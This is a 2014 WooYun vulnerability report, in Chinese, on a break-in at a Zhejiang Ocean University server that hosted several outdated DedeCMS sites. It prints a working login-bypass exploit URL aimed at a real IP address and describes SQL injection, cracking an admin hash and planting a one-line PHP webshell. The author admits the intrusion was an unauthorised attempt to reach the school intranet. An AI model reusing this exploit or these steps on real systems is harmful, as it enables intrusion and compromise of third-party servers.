当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066026

漏洞标题:浙海大一分站好几个织梦过旧导致拿下webshell

相关厂商:浙江海洋学院

漏洞作者: reality0ne

提交时间:2014-06-24 11:42

修复时间:2014-06-29 11:43

公开时间:2014-06-29 11:43

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-24: 细节已通知厂商并且等待厂商处理中
2014-06-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一个服务器上挂了好多的站,好几个都是织梦老版本的,从一个站的文件管理器残留部分直到拿下webshell~

详细说明:

恩,要放假了,学校还是没有给出在外网查成绩的可行方案,老师们公开的VPN用的人太多实在是太不稳定了,怎么办呢。。。我们自己搞一台挂个代理什么的试试吧~
首先去浙海大主页看看,恩?今天改程序了?页面完全是全新的,找找看吧= =在左下角找到了一个 校友网,网址相当不专业啊 http://61.153.216.101/xiao-you/ ,没看出来是什么程序,试下robots.txt吧,诶,果然有,这下有经验的一下就看出是织梦了~

 2014-06-24 10.54.33.png


看下后台在哪里~(被以前一个织梦坑惨了,完全找不到后台啊你妹= =)试下dede,果然没有,试下cwebs,也没有,试下dedecms,yooooo~,出来了~(后来证明去翻数据库错误消息文件里也是可以找到的)

 2014-06-24 10.56.31.png


看了下版本,v53.1 。找下有没有什么公开的漏洞,果然有一个常量覆盖的,直接架一个本地数据库进后台~
http://61.153.216.101/xiao-you/dedecms/login.php?dopost=login&validate=dcug&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=255.255.255.255&_POST[GLOBALS][cfg_dbuser]=dbusername&_POST[GLOBALS][cfg_dbpwd]=dbpassword&_POST[GLOBALS][cfg_dbname]=dbname
看下最简单的文件管理器删了没,呵呵= =果然删了,但是。。。管理员只删了file_manage_main.php,文件管理器不只这一个文件呦~试下file_pic_view.php,恩,果然能看见一些信息,把目录改到/呢?诶!这服务器上还挂了好多网站啊~

 2014-06-24 11.05.06.png


既然这站拿不下来索性去别的站看看~来到DKKT,进了下后台登录,v5.6,试下已知的SQL注入

 2014-06-24 11.13.23.png


成功拿到~上cmd5,恩?要钱,淘宝之~成功进入后台。这个站的文件管理器还在,新建一个php,插入一句话,成功。
菜刀之~

 2014-06-24 11.16.21.png


最后别忘了我们最初的想法,我们是为了在家里能顺利突破内网查成绩呦~试下file_get_conent('http://172.16.25.30/')。。。擦,为什么不行= =那搞这服务器就没多大意义了╮(╯_╰)╭,把玩了一会,没什么意思就删了~

漏洞证明:

再来一张整体的图片

 2014-06-24 11.20.51.png

修复方案:

权限精确得配置还不够= =有些网站没用了就直接删了吧
弱口令还是存在的,改得更复杂一点。
织梦这程序还是不安全啊= =
只要有校外查成绩的可行方案,我坚信我绝对不会来搞这台服务器~绝对不会~绝对不会~据对不会~

版权声明:转载请注明来源 reality0ne@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-29 11:43

厂商回复:

最新状态:

暂无